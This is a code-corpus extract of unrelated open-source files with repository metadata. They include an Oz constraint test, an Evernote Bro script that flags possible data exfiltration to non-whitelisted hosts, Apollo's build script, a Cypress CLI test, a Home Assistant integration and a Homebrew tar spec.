functor import FD Search export Return define SRAT = proc {$ Q} proc {Vector V} {FD.tuple v 10 0#1 V} end proc {Sum V S} {FD.decl S} {FD.sum V '=:' S} end proc {Assert I [U V W X Y]} A.I=U B.I=V C.I=W D.I=X E.I=Y end A = {Vector} B = {Vector} C = {Vector} D = {Vector} E = {Vector} SumA = {Sum A} SumB = {Sum B} SumC = {Sum C} SumD = {Sum D} SumE = {Sum E} SumAE = {Sum [SumA SumE]} SumBCD = {Sum [SumB SumC SumD]} in {FD.tuple q 10 1#5 Q} {For 1 10 1 proc {$ I} {Assert I [Q.I=:1 Q.I=:2 Q.I=:3 Q.I=:4 Q.I=:5]} end} %1 {Assert 1 [ B.2 {FD.conj B.3 (B.2=:0)} {FD.conj B.4 (B.2+B.3=:0)} {FD.conj B.5 (B.2+B.3+B.4=:0)} {FD.conj B.6 (B.2+B.3+B.4+B.5=:0)} ]} %2 {Assert 2 [Q.2=:Q.3 Q.3=:Q.4 Q.4=:Q.5 Q.5=:Q.6 Q.6=:Q.7]} Q.1\=:Q.2 Q.7\=:Q.8 Q.8\=:Q.9 Q.9\=:Q.10 %3 {Assert 3 [Q.1=:Q.3 Q.2=:Q.3 Q.4=:Q.3 Q.7=:Q.3 Q.6=:Q.3]} %4 {FD.element Q.4 [0 1 2 3 4] SumA} %5 {Assert 5 [Q.10=:Q.5 Q.9=:Q.5 Q.8=:Q.5 Q.7=:Q.5 Q.6=:Q.5]} %6 {Assert 6 [SumA=:SumB SumA=:SumC SumA=:SumD SumA=:SumE _]} %7 {FD.element Q.7 [4 3 2 1 0] {FD.decl}={FD.distance Q.7 Q.8 '=:'}} %8 {FD.element Q.8 [2 3 4 5 6] SumAE} %9 {Assert 9 [{FD.reified.int [2 3 5 7] SumBCD } {FD.reified.int [1 2 6] SumBCD } {FD.reified.int [0 1 4 9] SumBCD } {FD.reified.int [0 1 8] SumBCD } {FD.reified.int [0 5 10] SumBCD } ]} %10 skip {FD.distribute ff Q} end SRATSol = [q(3 4 5 2 5 5 4 3 2 1)] Return= fd([srat([ all(equal(fun {$} {Search.base.all SRAT} end SRATSol) keys: [fd]) all_entailed(entailed(proc {$} {Search.base.all SRAT _} end) keys: [fd entailed]) ]) ]) end
Oz
3
Ahzed11/mozart2
platform-test/fd/srat.oz
[ "BSD-2-Clause" ]
.hide-test-frame { position: absolute; top: -9999px; left: -9999px; visibility: hidden; }
CSS
3
fcastillo-serempre/freeCodeCamp
client/src/templates/Challenges/components/test-frame.css
[ "BSD-3-Clause" ]
many 10 bigger foo smallified shh 1 wow
Dogescript
0
PinkDiamond1/dogescript
test/language-spec/operators/smallified/control/many/rhs/source.djs
[ "MIT" ]
Leisure tools for Atom. This is to be run in an iframe as a namespace so that Atom can use it as-is. reqConfig = baseUrl: '.' paths: # the left side is the module ID, # the right side is the path to # the jQuery file, relative to baseUrl. # Also, the path should NOT include # the '.js' file extension. This example # is using jQuery 1.9.0 located at # js/lib/jquery-1.9.0.js, relative to # the HTML page. jquery: 'lib/jquery-2.1.4.min' #jqueryui: 'lib/jquery-ui-1.9.1.custom.min' jqueryui: 'lib/jquery-ui.min-1.11.4' #jqueryui: 'lib/jquery-ui-1.11.4' acorn: 'lib/acorn-3.2.0' acorn_loose: 'lib/acorn_loose-3.2.0' acorn_walk: 'lib/acorn_walk-3.2.0' immutable: 'lib/immutable-3.8.1.min' handlebars: 'lib/handlebars-v4.0.5' sockjs: 'lib/sockjs-1.0.0.min' define ['./base', './org', './docOrg'], (Base, Org, DocOrg)-> { parseOrgMode Fragment Headline headlineRE } = Org { orgDoc getCodeItems blockSource } = DocOrg exports = { Org DocOrg } atomView.setTools exports exports
Literate CoffeeScript
3
zot/Leisure
src/atom-tools.litcoffee
[ "Zlib" ]
<?xml version="1.0" encoding="UTF-8"?> <!-- ******************************************************************* --> <!-- --> <!-- © Copyright IBM Corp. 2010, 2013 --> <!-- --> <!-- Licensed under the Apache License, Version 2.0 (the "License"); --> <!-- you may not use this file except in compliance with the License. --> <!-- You may obtain a copy of the License at: --> <!-- --> <!-- http://www.apache.org/licenses/LICENSE-2.0 --> <!-- --> <!-- Unless required by applicable law or agreed to in writing, software --> <!-- distributed under the License is distributed on an "AS IS" BASIS, --> <!-- WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or --> <!-- implied. See the License for the specific language governing --> <!-- permissions and limitations under the License. --> <!-- --> <!-- ******************************************************************* --> <faces-config> <faces-config-extension> <namespace-uri>http://www.ibm.com/xsp/coreex</namespace-uri> <default-prefix>xe</default-prefix> <designer-extension> <control-subpackage-name>tagcloud</control-subpackage-name> </designer-extension> </faces-config-extension> <!-- Tag Cloud control --> <component> <description>Control that displays a tag cloud</description> <!-- TODO what is a tagcloud ... need fuller description --> <display-name>Tag Cloud</display-name> <component-type>com.ibm.xsp.extlib.tagcloud.TagCloud</component-type> <component-class>com.ibm.xsp.extlib.component.tagcloud.UITagCloud</component-class> <group-type-ref>com.ibm.xsp.extlib.group.aria_label</group-type-ref> <property> <description>Indicates if the slider is visible</description> <!-- TODO see if description can be improved ... what slider does and is --> <display-name>Slider Visible</display-name> <property-name>sliderVisible</property-name> <property-class>boolean</property-class> <property-extension> <!-- TODO defaults to true - should be notes as is not the norm --> <default-value>true</default-value> <tags>todo</tags> <designer-extension> <category>basics</category> </designer-extension> </property-extension> </property> <!-- TODO apply cloudTitle as control header text (add accessible title later)--> <!-- TODO Where is the "Top X Tags" coming from ??? --> <!--# leave {0} alone - it is intended to be shown in the tootip as is --> <!-- TODO remove default-value, render should return default when cloudTitle is null --> <!-- <property> <description>Text for use in a section header or label. The placeholder {0} will be substituted with the actual number of tags rendered.</description> <display-name>Tag Cloud Title</display-name> <property-name>title</property-name> <property-class>string</property-class> <property-extension> <localizable>true</localizable> <designer-extension> <default-value>{0} Tags</default-value> <editor>com.ibm.std.String</editor> <category>basics</category> </designer-extension> <required>false</required> </property-extension> </property> --> <property> <!--# leave {0} alone - it is intended to be shown in the tootip as is --> <description>Mouse-over pop-up text for individual member tags, i.e. elements of the tag cloud. The placeholder {0} will be substituted with the number of entries for the tag.</description> <display-name>Alternate Text</display-name> <property-name>alternateText</property-name> <property-class>string</property-class> <property-extension> <localizable>true</localizable> <designer-extension> <category>basics</category> </designer-extension> </property-extension> </property> <property> <description>Data provider for the tag cloud</description> <display-name>Tag Cloud Data</display-name> <property-name>cloudData</property-name> <property-class>com.ibm.xsp.extlib.component.tagcloud.ITagCloudData</property-class> <property-extension> <allow-run-time-binding>false</allow-run-time-binding> <designer-extension> <category>data</category> </designer-extension> </property-extension> </property> <component-extension> <component-family>javax.faces.Panel</component-family> <!-- TODO Teamroom impl overrides this renderer with OneUI custom renderer from ExtLib - why? Does theme not do this?? --> <renderer-type>com.ibm.xsp.extlib.tagcloud.TagCloud</renderer-type> <tag-name>tagCloud</tag-name> <designer-extension> <in-palette>true</in-palette> <category>Extension Library</category> </designer-extension> </component-extension> </component> <!-- Tag cloud data --> <complex-type> <description>The base class for Tag Cloud data providers</description> <display-name>Abstract Tag Cloud Data Provider</display-name> <complex-id>com.ibm.xsp.extlib.component.tagcloud.ITagCloudData</complex-id> <complex-class>com.ibm.xsp.extlib.component.tagcloud.ITagCloudData</complex-class> </complex-type> </faces-config>
XPages
3
jesse-gallagher/XPagesExtensionLibrary
extlib/lwp/product/runtime/eclipse/plugins/com.ibm.xsp.extlib.controls/src/com/ibm/xsp/extlib/config/raw-extlib-tagcloud.xsp-config
[ "Apache-2.0" ]
##! This script will generate a notice if an apparent protocol session, ##! long flow, or excessive short flows originate or terminate at a host, ##! net, or reverse DNS zone that isn't whitelisted. ##! ##! The input framework is used to populate tables of whitelists of subnets, ##! and zones, optionally with peers. Kinda the inverse of this BotFlex script: ##! https://github.com/sheharbano/BotFlex/blob/master/services/blacklist_mgr.bro @load base/frameworks/input @load evernote/human module Exfiltration; ## Subnets used to supress alerts are loaded dynamically using the input framework type IdxNet: record { whitelist_subnet: subnet; }; ## Hostnames used to supress alerts are loaded dynamically using the input framework type IdxName: record { whitelist_hostname: string; }; ## Domains will read once and concatentated into to a single large regular ## expression at bro_init() type IdxZone: record { whitelist_zone: string; }; ## Comments can be used to describe whitelisted subnets, domains, and hostnames. type WhitelistAttributes: record { comment: string; }; export { ## Context notices provide both superssion justification and a record of important ## knowns about flows. redef enum Notice::Type += { Context, }; ## Hostname and Subnet whitelists can be loaded by the input framework. ## Redefine them in your local.bro to be in e.g. ## /opt/bro/share/bro/site/input/hostnames.whitelist global file_of_whitelisted_hostnames = "hostnames.whitelist" &redef; global file_of_whitelisted_subnets = "subnets.whitelist" &redef; ## Store each whitelist in a table global whitelisted_hostnames: table[string] of WhitelistAttributes = table() &redef; global whitelisted_subnets: table[subnet] of WhitelistAttributes = table() &redef; ## Regular expressions can only be generated at init, which can happen ## before the input framework has loaded. Redefine them in local.bro global common_zones: set[string] &redef; global whitelisted_zones_regex: pattern = /MATCH_NOTHING/ &redef; global local_zones_regex: pattern = /MATCH_NOTHING/ &redef; ## Begin caching contextual findings since bro_init() so that incidators found in one ## connection persist at simpler levels in future connections. global whitelist_cache: table[addr] of string &redef; } # Notice context so that connections can be annotated when they match whitelists. function provide_context(c: connection, meta: string) { NOTICE([$note=Context, $msg=meta, $conn=c]); } # Notice context so that connections can be annotated even when a full # connection record is not available at notice time. function provide_connectionless_context(id: conn_id, meta: string) { NOTICE([$note=Context, $msg=meta, $id=id]); } event bro_init() { # Notice and log the full regular expression assembled from the domain # whitelist. Reporter::info("Building zone regex"); whitelisted_zones_regex = set_to_regex(common_zones, "(\\.?|\\.)(~~)$"); local_zones_regex = set_to_regex(Site::local_zones, "(\\.?|\\.)(~~)$"); Reporter::info(fmt("Zone regex complete: %s", whitelisted_zones_regex)); # Load and watch the file of whitelisted subnets so that it can be # updated without restarting Bro. local whitelist_path = fmt(file_of_whitelisted_subnets); Reporter::info(fmt("Loading subnet whitelists from %s...",whitelist_path)); Input::add_table([$source=whitelist_path, $name="whitelist_subnet_stream", $idx=IdxNet, $val=WhitelistAttributes, $destination=Exfiltration::whitelisted_subnets, $mode=Input::REREAD]); # Load and watch the file of whitelisted hostnames so that it can be # updated without restarting Bro. whitelist_path = fmt(file_of_whitelisted_hostnames); Reporter::info(fmt("Loading hostname whitelists from %s...",whitelist_path)); Input::add_table([$source=whitelist_path, $name="whitelist_hostname_stream", $idx=IdxName, $val=WhitelistAttributes, $destination=Exfiltration::whitelisted_hostnames, $mode=Input::REREAD]); } event Input::end_of_data(name: string, source:string) { Reporter::info(fmt("Input file: %s is ready", source)); } # TODO: consider moving this to evernote/human function x509_subject_common_name(distinguished_name: string): string { const match_common_name: pattern = /CN=(.*?),/; local extracted_common_name = match_pattern(distinguished_name, match_common_name); if (extracted_common_name$matched) { const extract_common_name: pattern = /\.[^,]*/; local extracted_common_name_domain = match_pattern(extracted_common_name$str, extract_common_name); if (extracted_common_name_domain$matched) return extracted_common_name_domain$str; } else return "no_match"; } ## Whitelist context does not assert an identity relationship to observables and knowns. ## Whitelist context is merely a suppression tool. Do not assert anything beyond prior ## known association. function add_to_whitelist_cache(a: addr, uid: string, comment: string) { whitelist_cache[a] = fmt("%s was previously associated with %s in %s", a, comment, uid); } function whitelisted_connection_in_cache(c: connection): bool { if (c$id$resp_h in whitelist_cache) { provide_context(c, whitelist_cache[c$id$resp_h]); return T; } else { return F; } } function whitelisted_id_in_cache(id: conn_id): bool { if (id$resp_h in whitelist_cache) { provide_connectionless_context(id, whitelist_cache[id$resp_h]); return T; } else { return F; } } function whitelisted_address_by_subnet(a: addr): bool { if (a in whitelisted_subnets) { local meta = ""; for (whitelisted_subnet in whitelisted_subnets) { if (a in whitelisted_subnet) meta += fmt("%s -> %s: %s ", a, whitelisted_subnet, whitelisted_subnets[whitelisted_subnet]$comment); } return T; } else { return F; } } function whitelisted_connection_by_subnet(c: connection): bool { if (c$id$resp_h in whitelisted_subnets) { local meta = ""; for (whitelisted_subnet in whitelisted_subnets) { if (c$id$resp_h in whitelisted_subnet) meta += fmt("%s -> %s: %s", c$id$resp_h, whitelisted_subnet, whitelisted_subnets[whitelisted_subnet]$comment); } provide_context(c, meta); return T; } else { return F; } } function whitelisted_connection_by_hostname(c: connection, name: string): bool { if (name in whitelisted_hostnames) { local meta = fmt("%s: %s.", name, whitelisted_hostnames[name]$comment); provide_context(c, meta); return T; } else { return F; } } function whitelisted_connection_by_hostname_zone(c: connection, name: string): bool { if (whitelisted_zones_regex in name) { local match = match_pattern(name, whitelisted_zones_regex); local meta = fmt("%s: %s", name, match$str); provide_context(c, meta); return T; } else { return F; } } function whitelisted_id_by_hostname(id: conn_id, name: string): bool { if (name in whitelisted_hostnames) { local meta = fmt("%s: %s.", name, whitelisted_hostnames[name]$comment); provide_connectionless_context(id, meta); return T; } else { return F; } } function whitelisted_id_by_hostname_zone(id: conn_id, name: string): bool { if (whitelisted_zones_regex in name) { local match = match_pattern(name, whitelisted_zones_regex); local meta = fmt("%s: %s", name, match$str); provide_connectionless_context(id, meta); return T; } else { return F; } }
Bro
5
evernote/bro-scripts
exfiltration/scripts/main.bro
[ "BSD-3-Clause" ]
#! /usr/bin/env bash set -e TOP_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd -P)" source "${TOP_DIR}/scripts/apollo.bashrc" ARCH="$(uname -m)" SUPPORTED_ARCHS=" x86_64 aarch64 " APOLLO_VERSION="@non-git" APOLLO_ENV="" USE_ESD_CAN=false : ${STAGE:=dev} AVAILABLE_COMMANDS="config build build_dbg build_opt build_cpu build_gpu build_opt_gpu test coverage lint \ buildify check build_fe build_teleop build_prof doc clean format usage -h --help" function check_architecture_support() { if [[ "${SUPPORTED_ARCHS}" != *" ${ARCH} "* ]]; then error "Unsupported CPU arch: ${ARCH}. Currently, Apollo only" \ "supports running on the following CPU archs:" error "${TAB}${SUPPORTED_ARCHS}" exit 1 fi } function check_platform_support() { local platform="$(uname -s)" if [[ "${platform}" != "Linux" ]]; then error "Unsupported platform: ${platform}." error "${TAB}Apollo is expected to run on Linux systems (E.g., Debian/Ubuntu)." exit 1 fi } function check_minimal_memory_requirement() { local minimal_mem_gb="2.0" local actual_mem_gb="$(free -m | awk '/Mem:/ {printf("%0.2f", $2 / 1024.0)}')" if (($(echo "$actual_mem_gb < $minimal_mem_gb" | bc -l))); then warning "System memory [${actual_mem_gb}G] is lower than the minimum required" \ "[${minimal_mem_gb}G]. Apollo build could fail." fi } function determine_esdcan_use() { local esdcan_dir="${APOLLO_ROOT_DIR}/third_party/can_card_library/esd_can" local use_esd=false if [[ "${ARCH}" == "x86_64" ]] && [[ -f "${esdcan_dir}/include/ntcan.h" ]] && [[ -f "${esdcan_dir}/lib/libntcan.so.4" ]]; then use_esd=true fi USE_ESD_CAN="${use_esd}" } function check_apollo_version() { local branch="$(git_branch)" if [ "${branch}" == "${APOLLO_VERSION}" ]; then return fi local sha1="$(git_sha1)" local stamp="$(git_date)" APOLLO_VERSION="${branch}-${stamp}-${sha1}" } function apollo_env_setup() { check_apollo_version check_architecture_support check_platform_support check_minimal_memory_requirement determine_gpu_use_target determine_esdcan_use APOLLO_ENV="${APOLLO_ENV} STAGE=${STAGE}" APOLLO_ENV="${APOLLO_ENV} USE_ESD_CAN=${USE_ESD_CAN}" # Add more here ... info "Apollo Environment Settings:" info "${TAB}APOLLO_ROOT_DIR: ${APOLLO_ROOT_DIR}" info "${TAB}APOLLO_CACHE_DIR: ${APOLLO_CACHE_DIR}" info "${TAB}APOLLO_IN_DOCKER: ${APOLLO_IN_DOCKER}" info "${TAB}APOLLO_VERSION: ${APOLLO_VERSION}" if "${APOLLO_IN_DOCKER}"; then info "${TAB}DOCKER_IMG: ${DOCKER_IMG##*:}" fi info "${TAB}APOLLO_ENV: ${APOLLO_ENV}" info "${TAB}USE_GPU: USE_GPU_HOST=${USE_GPU_HOST} USE_GPU_TARGET=${USE_GPU_TARGET}" if [[ -z "${APOLLO_BAZEL_DIST_DIR}" ]]; then source "${TOP_DIR}/cyber/setup.bash" fi if [[ ! -d "${APOLLO_BAZEL_DIST_DIR}" ]]; then mkdir -p "${APOLLO_BAZEL_DIST_DIR}" fi if [ ! -f "${APOLLO_ROOT_DIR}/.apollo.bazelrc" ]; then env ${APOLLO_ENV} bash "${APOLLO_ROOT_DIR}/scripts/apollo_config.sh" --noninteractive fi } #TODO(all): Update node modules function build_dreamview_frontend() { pushd "${APOLLO_ROOT_DIR}/modules/dreamview/frontend" >/dev/null yarn build popd >/dev/null } function build_test_and_lint() { env ${APOLLO_ENV} bash "${build_sh}" env ${APOLLO_ENV} bash "${test_sh}" --config=unit_test env ${APOLLO_ENV} bash "${APOLLO_ROOT_DIR}/scripts/apollo_lint.sh" --cpp success "Build and Test and Lint finished." } function _usage() { echo -e "\n${RED}Usage${NO_COLOR}: .${BOLD}/apollo.sh${NO_COLOR} [OPTION]" echo -e "\n${RED}Options${NO_COLOR}: ${BLUE}config [options]${NO_COLOR}: config bazel build environment either non-interactively (default) or interactively. ${BLUE}build [module]${NO_COLOR}: run build for cyber (<module> = cyber) or modules/<module>. If <module> unspecified, build all. ${BLUE}build_dbg [module]${NO_COLOR}: run debug build. ${BLUE}build_opt [module]${NO_COLOR}: run optimized build. ${BLUE}build_cpu [module]${NO_COLOR}: build in CPU mode. Equivalent to 'bazel build --config=cpu' ${BLUE}build_gpu [module]${NO_COLOR}: run build in GPU mode. Equivalent to 'bazel build --config=gpu' ${BLUE}build_opt_gpu [module]${NO_COLOR}: optimized build in GPU mode. Equivalent to 'bazel build --config=opt --config=gpu' ${BLUE}test [module]${NO_COLOR}: run unittest for cyber (module='cyber') or modules/<module>. If unspecified, test all. ${BLUE}coverage [module]${NO_COLOR}: run coverage test for cyber (module='cyber') or modules/<module>. If unspecified, coverage all. ${BLUE}lint${NO_COLOR}: run code style check ${BLUE}buildify${NO_COLOR}: run 'buildifier' to fix style of bazel files. ${BLUE}check${NO_COLOR}: run build, test and lint on all modules. Recommmened before checking in new code. ${BLUE}build_fe${NO_COLOR}: compile frontend JS code for Dreamview. Requires all node_modules pre-installed. ${BLUE}build_teleop${NO_COLOR}: run build with teleop enabled. ${BLUE}build_prof [module]${NO_COLOR}: build with perf profiling support. Not implemented yet. ${BLUE}doc${NO_COLOR}: generate doxygen document ${BLUE}release${NO_COLOR}: build Apollo binary releases ${BLUE}clean${NO_COLOR}: cleanup bazel output and log/coredump files ${BLUE}format${NO_COLOR}: format C++/Python/Bazel/Shell files ${BLUE}usage${NO_COLOR}: show this message and exit " } function _check_command() { local name="${BASH_SOURCE[0]}" local commands="$(echo ${AVAILABLE_COMMANDS} | xargs)" local help_msg="Run './apollo.sh --help' for usage." local cmd="$@" python scripts/command_checker.py --name "${name}" --command "${cmd}" --available "${commands}" --helpmsg "${help_msg}" } function main() { if [ "$#" -eq 0 ]; then _usage exit 0 fi apollo_env_setup local build_sh="${APOLLO_ROOT_DIR}/scripts/apollo_build.sh" local test_sh="${APOLLO_ROOT_DIR}/scripts/apollo_test.sh" local coverage_sh="${APOLLO_ROOT_DIR}/scripts/apollo_coverage.sh" local ci_sh="${APOLLO_ROOT_DIR}/scripts/apollo_ci.sh" local cmd="$1" shift case "${cmd}" in config) env ${APOLLO_ENV} bash "${APOLLO_ROOT_DIR}/scripts/apollo_config.sh" "$@" ;; build) env ${APOLLO_ENV} bash "${build_sh}" "$@" ;; build_opt) env ${APOLLO_ENV} bash "${build_sh}" --config=opt "$@" ;; build_dbg) env ${APOLLO_ENV} bash "${build_sh}" --config=dbg "$@" ;; build_cpu) env ${APOLLO_ENV} bash "${build_sh}" --config=cpu "$@" ;; build_gpu) env ${APOLLO_ENV} bash "${build_sh}" --config=gpu "$@" ;; build_opt_gpu) env ${APOLLO_ENV} bash "${build_sh}" --config=opt --config=gpu "$@" ;; build_prof) env ${APOLLO_ENV} bash "${build_sh}" --config=prof "$@" ;; build_teleop) env ${APOLLO_ENV} bash "${build_sh}" --config=teleop "$@" ;; build_fe) build_dreamview_frontend ;; test) env ${APOLLO_ENV} bash "${test_sh}" --config=unit_test "$@" ;; coverage) env ${APOLLO_ENV} bash "${coverage_sh}" "$@" ;; cibuild) env ${APOLLO_ENV} bash "${ci_sh}" "build" ;; citest) env ${APOLLO_ENV} bash "${ci_sh}" "test" ;; cilint) env ${APOLLO_ENV} bash "${ci_sh}" "lint" ;; check) build_test_and_lint ;; buildify) env ${APOLLO_ENV} bash "${APOLLO_ROOT_DIR}/scripts/apollo_buildify.sh" ;; lint) env ${APOLLO_ENV} bash "${APOLLO_ROOT_DIR}/scripts/apollo_lint.sh" "$@" ;; clean) env ${APOLLO_ENV} bash "${APOLLO_ROOT_DIR}/scripts/apollo_clean.sh" "$@" ;; release) env ${APOLLO_ENV} bash "${APOLLO_ROOT_DIR}/scripts/apollo_release.sh" "$@" ;; doc) env ${APOLLO_ENV} bash "${APOLLO_ROOT_DIR}/scripts/apollo_docs.sh" "$@" ;; format) env ${APOLLO_ENV} bash "${APOLLO_ROOT_DIR}/scripts/apollo_format.sh" "$@" ;; usage) _usage ;; -h|--help) _usage ;; *) _check_command "${cmd}" ;; esac } main "$@"
Shell
4
jzjonah/apollo
apollo.sh
[ "Apache-2.0" ]
component { public tagCFC function init() { var q=123; if(1 eq 1){ var z=123; var asdfghjklasdfghjklasdfghjklasdfghjklasdfghjklasdfghjkl=10; } } }
ColdFusion CFC
1
tonym128/CFLint
src/test/resources/com/cflint/tests/VariableNameChecker/cftry.cfc
[ "BSD-3-Clause" ]
(" pp 60 => ) <_c, _e, _a, c, e, a, f> => @notes .b o~ .c o~~ mf {! foo !! .a !notes.choose {: ] } } ]] :: !x times :} .b !notes.choose {: ] :: !x times :} .c !notes.choose {: ) :: !x times :} !} {: !foo<<1,2,3>.choose> :: true :} ".skoar.play; )
SuperCollider
1
sofakid/Skoarcery
SuperCollider/examples/yay.scd
[ "Artistic-2.0" ]
#pragma once #include "envoy/server/guarddog_config.h" #include "envoy/thread/thread.h" #include "envoy/watchdog/v3/abort_action.pb.h" namespace Envoy { namespace Watchdog { /** * A GuardDogAction that will terminate the process by killing the * stuck thread. */ class AbortAction : public Server::Configuration::GuardDogAction { public: AbortAction(envoy::watchdog::v3::AbortActionConfig& config, Server::Configuration::GuardDogActionFactoryContext& context); void run(envoy::config::bootstrap::v3::Watchdog::WatchdogAction::WatchdogEvent event, const std::vector<std::pair<Thread::ThreadId, MonotonicTime>>& thread_last_checkin_pairs, MonotonicTime now) override; private: const absl::Duration wait_duration_; }; using AbortActionPtr = std::unique_ptr<AbortAction>; } // namespace Watchdog } // namespace Envoy
C
3
dcillera/envoy
source/common/watchdog/abort_action.h
[ "Apache-2.0" ]
/* eslint-disable no-undef, camelcase */ /// <reference types="cypress" /> const BASE_DIR = Cypress.env('RW_PATH') describe('Check Redwood cli commands against tutorial', () => { // These tests aren't visual, as they only run on the CLI // Disable taking screenshots/videos for this spec before(() => { Cypress.config('record', false) }) after(() => { Cypress.config('record', true) }) it('Should run api tests successfully', () => { // Reset contacts service to initial state to pass tests cy.exec(`cd ${BASE_DIR}; yarn rw g sdl contact --force`) cy.exec(`cd ${BASE_DIR}; yarn rw test api --no-watch`) .its('code') .should('eq', 0) }) it('Should run web tests successfully', () => { cy.exec(`cd ${BASE_DIR}; yarn rw test web --no-watch --forceExit`) .its('code') .should('eq', 0) }) it('Should run build successfully (no prerender)', () => { // Check if webpack build on web, and babel build on api // work correctly cy.exec(`cd ${BASE_DIR}; yarn rw build --no-prerender --verbose`) .its('code') .should('eq', 0) }) it('Should prerender about and homepage', () => { // Check if prerender is working cy.exec(`cd ${BASE_DIR}; yarn rw prerender`).its('code').should('eq', 0) const WEB_DIST = `${BASE_DIR}/web/dist` // Check prerendered files are generated // Prerender prop added to routes in codemods/Step6_1_Routes.js cy.readFile(`${WEB_DIST}/index.html`).should('contain', 'Redwood Blog') cy.readFile(`${WEB_DIST}/about.html`).should( 'contain', 'This site was created to demonstrate my mastery of Redwood' ) }) })
XS
5
josemasar/redwood
tasks/e2e/cypress/integration/02-cli/02-cli-commands.spec.xs
[ "MIT" ]
#!/bin/sh PATH=/bin:/usr/bin TERM=screen [ -z "$TEST_TMUX" ] && TEST_TMUX=$(readlink -f ../tmux) TMUX="$TEST_TMUX -Ltest" $TMUX kill-server 2>/dev/null for i in conf/*.conf; do $TMUX -f/dev/null start \; source -n $i || exit 1 done exit 0
Shell
3
SliceThePi/tmux
regress/conf-syntax.sh
[ "ISC" ]
#!/bin/bash set -e # called when COVERAGE=="true" and DISTRIB=="conda" export PATH=$HOME/miniconda3/bin:$PATH source activate $VIRTUALENV # Need to run codecov from a git checkout, so we copy .coverage # from TEST_DIR where pytest has been run pushd $TEST_DIR coverage combine --append popd cp $TEST_DIR/.coverage $BUILD_REPOSITORY_LOCALPATH codecov --root $BUILD_REPOSITORY_LOCALPATH -t $CODECOV_TOKEN || echo "codecov upload failed"
Shell
4
emarkou/scikit-learn
build_tools/azure/upload_codecov.sh
[ "BSD-3-Clause" ]
"""The Prosegur Alarm integration.""" import logging from pyprosegur.auth import Auth from homeassistant.config_entries import ConfigEntry from homeassistant.const import CONF_PASSWORD, CONF_USERNAME, Platform from homeassistant.core import HomeAssistant from homeassistant.exceptions import ConfigEntryAuthFailed, ConfigEntryNotReady from homeassistant.helpers import aiohttp_client from .const import CONF_COUNTRY, DOMAIN PLATFORMS = [Platform.ALARM_CONTROL_PANEL] _LOGGER = logging.getLogger(__name__) async def async_setup_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool: """Set up Prosegur Alarm from a config entry.""" try: session = aiohttp_client.async_get_clientsession(hass) hass.data.setdefault(DOMAIN, {}) hass.data[DOMAIN][entry.entry_id] = Auth( session, entry.data[CONF_USERNAME], entry.data[CONF_PASSWORD], entry.data[CONF_COUNTRY], ) await hass.data[DOMAIN][entry.entry_id].login() except ConnectionRefusedError as error: _LOGGER.error("Configured credential are invalid, %s", error) raise ConfigEntryAuthFailed from error except ConnectionError as error: _LOGGER.error("Could not connect with Prosegur backend: %s", error) raise ConfigEntryNotReady from error hass.config_entries.async_setup_platforms(entry, PLATFORMS) return True async def async_unload_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool: """Unload a config entry.""" unload_ok = await hass.config_entries.async_unload_platforms(entry, PLATFORMS) if unload_ok: hass.data[DOMAIN].pop(entry.entry_id) return unload_ok
Python
5
MrDelik/core
homeassistant/components/prosegur/__init__.py
[ "Apache-2.0" ]
data SnocList ty = Empty | Snoc (Main.SnocList ty) ty reverseSnoc : Main.SnocList ty -> List ty reverseSnoc Empty = [] reverseSnoc (Snoc xs x) = x :: reverseSnoc xs
Idris
4
ska80/idris-jvm
tests/typedd-book/chapter10/ReverseSnoc.idr
[ "BSD-3-Clause" ]
print $ bool true print $ bool false print $ bool yes print $ bool no print $ bool 1 print $ bool 0
Cirru
0
JavascriptID/sourcerer-app
src/test/resources/samples/langs/Cirru/bool.cirru
[ "MIT" ]
<interface name="mtd"> <!-- int get_info(struct mtd_info *info); --> <method rtype="int" name="get_info"> <arg atype="struct mtd_info *" name="info" /> </method> </interface>
D
3
CyberQueenMara/baseband-research
okl4_kernel/okl4_2.1.1-patch.9/libs/driverv2/include/mtd_if.di
[ "MIT" ]
//////////////////////////////////////////////////// // Multicomb // // // // Multiple simultaneous comb filters randomly // // chosen within a specified frequency range // // and spread across the stereo field // //////////////////////////////////////////////////// // // Settings: // // num (int): set number of comb filters (default 5) // minfreq (float): set low frequency // maxfreq (float): set high frequency // set (float, float): set both low and high freqs // revtime (dur): total ring time (default 1::second) Impulse imp => Multicomb comb => dac; 500::ms => comb.revtime; repeat (60) { comb.set(220,880); 1 => imp.next; 500::ms => now; }
ChucK
4
mariobuoninfante/chugins
Multicomb/multicomb-help.ck
[ "MIT" ]
# POPPLER_FIND_QT(VARIABLE-PREFIX, [ACTION-IF-FOUND], [ACTION-IF-NOT-FOUND]) # # Check whether the Qt3 libraries are available. # # -------------------------------------------------------------- AC_DEFUN([POPPLER_FIND_QT], [ PKG_CHECK_MODULES([libqt3], [qt-mt], [ ifelse([$2], , :, [$2]) ], [ ifelse([$3], , [AC_MSG_FAILURE([Qt development libraries not found])], [$3]) ]) ])
M4
4
albertobarri/idk
tests/third_party/poppler/m4/qt.m4
[ "MIT" ]
# typed: false # frozen_string_literal: true require "utils/tar" describe Utils::Tar do before do described_class.clear_executable_cache end describe ".available?" do it "returns true if tar or gnu-tar is available" do if described_class.executable.present? expect(described_class).to be_available else expect(described_class).not_to be_available end end end describe ".validate_file" do it "does not raise an error when tar and gnu-tar are unavailable" do allow(described_class).to receive(:available?).and_return false expect { described_class.validate_file "blah" }.not_to raise_error end context "when tar or gnu-tar is available" do let(:testball_resource) { "#{TEST_FIXTURE_DIR}/tarballs/testball-0.1.tbz" } let(:invalid_resource) { "#{TEST_TMPDIR}/invalid.tgz" } before do allow(described_class).to receive(:available?).and_return true end it "does not raise an error if file is not a tar file" do expect { described_class.validate_file "blah" }.not_to raise_error end it "does not raise an error if file is valid tar file" do expect { described_class.validate_file testball_resource }.not_to raise_error end it "raises an error if file is an invalid tar file" do FileUtils.touch invalid_resource expect { described_class.validate_file invalid_resource }.to raise_error SystemExit FileUtils.rm_f invalid_resource end end end end
Ruby
4
ylht/brew
Library/Homebrew/test/utils/tar_spec.rb
[ "BSD-2-Clause" ]
